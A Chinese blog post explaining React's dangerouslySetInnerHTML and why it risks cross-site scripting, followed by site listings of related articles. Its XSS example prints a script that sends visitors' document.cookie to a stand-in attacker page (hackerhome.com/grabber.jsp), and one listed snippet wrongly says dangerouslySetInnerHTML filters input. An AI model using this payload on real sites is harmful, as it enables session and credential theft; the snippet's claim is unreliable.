react 中正常显示HTML(dangerouslySetInnerHTML )

最新推荐文章于 2024-05-15 09:55:13 发布
最新推荐文章于 2024-05-15 09:55:13 发布
阅读量4.5k 收藏 6
点赞数 5
分类专栏: 随记 文章标签: js reactjs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36893477/article/details/108446569
版权

1.react 中正常显示HTML(dangerouslySetInnerHTML )

在react中,以变量形式把html字符串付给标签,不会解析成标签。这时候需要一个react属性(dangerouslySetInnerHTML )来解决。

  1. react官网解释:

不合时宜的使用 innerHTML 可能会导致 cross-site scripting (XSS) 攻击。 净化用户的输入来显示的时候,经常会出现错误,不合适的净化也是导致网页攻击 的原因之一。
  我们的设计哲学是让确保安全应该是简单的,开发者在执行“不安全”的操作的时候应该清楚地知道他们自己的意图。dangerouslySetInnerHTML 这个 prop 的命名是故意这么设计的,以此来警告,它的 prop 值( 一个对象而不是字符串 )应该被用来表明净化后的数据。

  1. 解决办法:
 <div dangerouslySetInnerHTML={{__html: this.state.content}}></div>
  1. 什么是 cross-site scripting (XSS)攻击:
    XSS示例
      在深入了解XSS的各个方面之前,让我们首先了解XSS攻击到底是怎样完成的。
      就以一个博客应用为例。其常常需要允许读者对博主的文章进行评论。在输入评论的编辑栏中,我们可以输入对该文章的评论,也可以输入以下HTML标记:
<Script>alert(“XSS attack available!”);</Script>

而从用户的角度来看,该网页中就出现了一个警告:
 在这里插入图片描述
也就是说,用户输入的脚本语言已经被用户的浏览器成功执行。当然,这可能只是一个对该网站的善意提醒。但是对于一个真正具有恶意的攻击者,其所插入的脚本代码更可能如下所示:

<script>document.write('<img src=http://www.hackerhome.com/grabber.jsp?msg='+document.cookie+' width=16 height=16 border=0 />');</script>

该段脚本将向当前评论内插入一个图片,而该图片所对应的URL则指向了hackerhome中的JSP页面grabber.jsp。从访问该评论的用户这一角度看来,其仅仅是一个不能显示的图片。但是对于恶意攻击者而言,该JSP页面将自动记录传入的msg参数内容,即访问评论用户所使用的cookie。该cookie可能包含用户的敏感信息,甚至是用户名,密码等重要信息。
所以,react的做法是不直接读取你的html代码,以此来避免cross-site scripting (XSS)攻击,让你的代码更加安全。
可以参考这篇文章:http://www.cnblogs.com/loveis715/archive/2012/07/13/2506846.html

qq_36893477
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
react获取HTML结构,并正常渲染标签
YH_ang_eng的博客
09-17 2537
React 正常显示 Html 代码: dangerouslySetInnerHTML 在工作、项目,有时候我们会遇到后端发来的数据为html结构,我们需要把他们正常渲染出来。 我们有两种方法: 使用原生方法:innerHTML:会写入内容并覆盖原内容 - 我们可以使用它来获取和写入某个元素标签的内容 // 结构 <div class="box"> <div ...
HTML使用React示例
08-17
HTML使用React示例 文章链接; https://blog.csdn.net/qq_44695727/article/details/132347717
dangerouslySetInnerHTMLReact显示html代码
mengsandy的专栏
08-03 804
当用户输入或者获取到的数据是一段HTML代码的时候,dangerouslySetInnerHTML就可以把这一段代码变成HTML,然后插入到某个地方。
推荐开源项目:Interweave——安全易用的React HTML渲染库
gitblog_00047的博客
05-15 241
推荐开源项目:Interweave——安全易用的React HTML渲染库 项目地址:https://gitcode.com/milesj/interweave 在Web开发,处理HTML字符串时,我们经常会遇到如何安全地渲染和管理这些字符串的问题。Interweave 是一个强大的React库,旨在解决这一问题,提供了丰富的功能,包括避免危险的 dangerouslySetInnerHTML ...
react 显示html5,让 React 正常显示你的 html 代码: dangerouslySetInnerHTML
weixin_39623671的博客
06-17 1135
做项目需要把服务器接口传过来的 HTML 文本字符串转换成 DOM 对象。有两种方法:第一种用 innerHTML;function parseToDOM(str){var div = document.createElement("div");if(typeof str == "string")div.innerHTML = str;return div.childNodes;}123456fu...
React dangerouslySetInnerHTML 使用
weixin_44874595的博客
02-10 757
React dangerouslySetInnerHTML 使用 在react,通过富文本编辑器进行操作后的内容,会保留原有的标签样式,并不能正确展示。 例如: this.state.sourText = <div>这是一段文字</div> ... render() { return <div>{this.state.sourText}<...
ReactdangerouslySetInnerHTML属性将HTML字符串解析为html代码
m0_60746894的博客
08-07 689
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
React正常显示HTML---dangerousSetInnerHtml
热门推荐
weixin_43134595的博客
02-14 1万+
运行以下代码的时候出现了html的标签, 后在li标签加上dangerouslySetInnerHTML={{__html:item}},html的内容得以正常显示 import React, {Component, Fragment} from ‘react’ export default class TodoList extends Component { constructor(pro...
React 如何正常渲染一段HTML字符串
shelutai的博客
02-02 804
React 如何正常渲染一段HTML字符串
React dangerouslySetInnerHTML api 的介绍与使用
Baron的技术blog
01-05 721
使用场景: 在 react 项目,当后端接口返回的一个字段里有HTML字符实体的情况下,是不会转换成对应样式的。 比如& g t; 就不会显示成>, < b r > 也不会进行换行。 这时候用 dangerouslySetInnerHTML就可以正常渲染混有 DOM字符串。 举例: <div dangerouslySetInnerHTML = {{ __html: 接口传来的数据}} /> 如果是直接调用渲染接口的值,则是以上的写法,如果仅仅是显示固定的内容,用如
dangerouslySetInnerHTML, 让React正常显示你的html代码和<br/>
onegoldensun的博客
07-25 4598
原文地址:http://www.cnblogs.com/xianyulaodi/p/5038258.html 昨天在弄一个让内容换行显示时,遇到一个问题,就是我有的代码在页面不换行,而是直接显示,代码如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14
react实现搜索结果关键词高亮显示
10-18
主要介绍了react实现搜索结果关键词高亮显示,使用react实现要比js简单很多,方法都是大同小异,具体实现代码大家跟随脚本之家小编一起看看吧
react-bpmn:在React显示BPMN 2.0图表
05-06
Reactbpmn 使用在应用程序显示BPMN 2.0图表。用法import ReactBpmn from 'react-bpmn' ;function App ( props ) { function onShown ( ) { console . log ( 'diagram shown' ) ; } function onLoading ( ) { ...
react-antd html5开发
03-03
在本项目,我们主要探讨的是使用React、Ant Design(antd)库以及HTML5进行本地化开发的相关技术。React是一个由Facebook开发的JavaScript库,它主要用于构建用户界面,特别是单页面应用程序。Ant Design则是一个...
JS使用react-tooltip插件实现鼠标悬浮显示
10-17
前段时间遇到的一个需求,要求鼠标悬停显示使用描述, 用到了react-tooltip插件,今天写一个总结,感兴趣的朋友跟随小编一起看看吧
Concis组件库封装——Loading加载
量子前端的博客
06-22 2001
一个常规的react loading组件的开发和测试
2024java面试题
07-26
2024年的Java面试题可能涵盖多个方面,包括Java基础知识、面向对象编程、集合框架、多线程与并发编程、JVM与性能优化、设计模式、Spring框架等。以下是一些可能出现在2024年Java面试的题目及其简要答案: 一、Java基础知识 面向对象的特征有哪些? 抽象:忽略主题与当前目标无关的部分,以便更关注与当前目标有关的部分。 继承:允许新类继承现有类的属性和方法,实现代码重用。 封装:将对象的状态信息隐藏在对象内部,不允许外部直接访问,而是通过公共方法进行访问和操作。 多态性:允许不同类的对象对同一消息作出响应,实现接口重用。 作用域public, private, protected, 以及不写时的区别是什么? public:任何地方都可以访问。 private:只能在本类内部访问。 protected:可以在同一包内及不同包的子类里访问。 不写(默认,也称为default):只能在同一包内访问。 int和Integer有什么区别? int是Java的原始数据类型,存储在栈内存。 Integer是Java为int提供的封装类,存储在堆内存,可以表示null。 二、
C课程设计之职工管理系统
最新发布
07-26
C课程设计之职工管理系统 C语言开发,可以使用dev-C++或者其他C编程软件打开编译运行 喜欢的同学,可以拿去使用
react项目class类 dangerouslysetinnerhtml 的点击事件的实现
05-22
React 的 class 组件使用 `dangerouslySetInnerHTML` 属性可以设置 HTML 字符串作为组件的子元素,但是需要注意安全问题。 如果需要在 `dangerouslySetInnerHTML` 添加点击事件,可以在组件挂载后通过 DOM 操作给元素绑定事件。例如,在组件的 `componentDidMount` 生命周期获取元素并添加点击事件: ```jsx class MyComponent extends React.Component { componentDidMount() { // 获取元素 const myElement = document.getElementById('my-element'); // 给元素添加点击事件 myElement.addEventListener('click', this.handleClick); } handleClick = (event) => { console.log('点击事件触发了', event); } render() { const htmlString = '<div id="my-element">点击我</div>'; return <div dangerouslySetInnerHTML={{ __html: htmlString }} />; } } ``` 在上面的代码,组件的 `render` 方法返回一个包含 HTML 字符串的 `div` 元素,并使用 `dangerouslySetInnerHTML` 属性将字符串设置为元素的子元素。在组件挂载后,通过 `document.getElementById` 获取元素并使用 `addEventListener` 给元素添加点击事件。点击事件的处理函数是 `handleClick`,并且使用箭头函数绑定了 `this`。 需要注意的是,使用 `dangerouslySetInnerHTML` 属性可能存在安全风险,因为它允许渲染未经过过滤的 HTML 字符串。如果需要渲染用户输入的数据,建议使用 React 提供的 `dangerouslySetInnerHTML` API 进行过滤和转义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值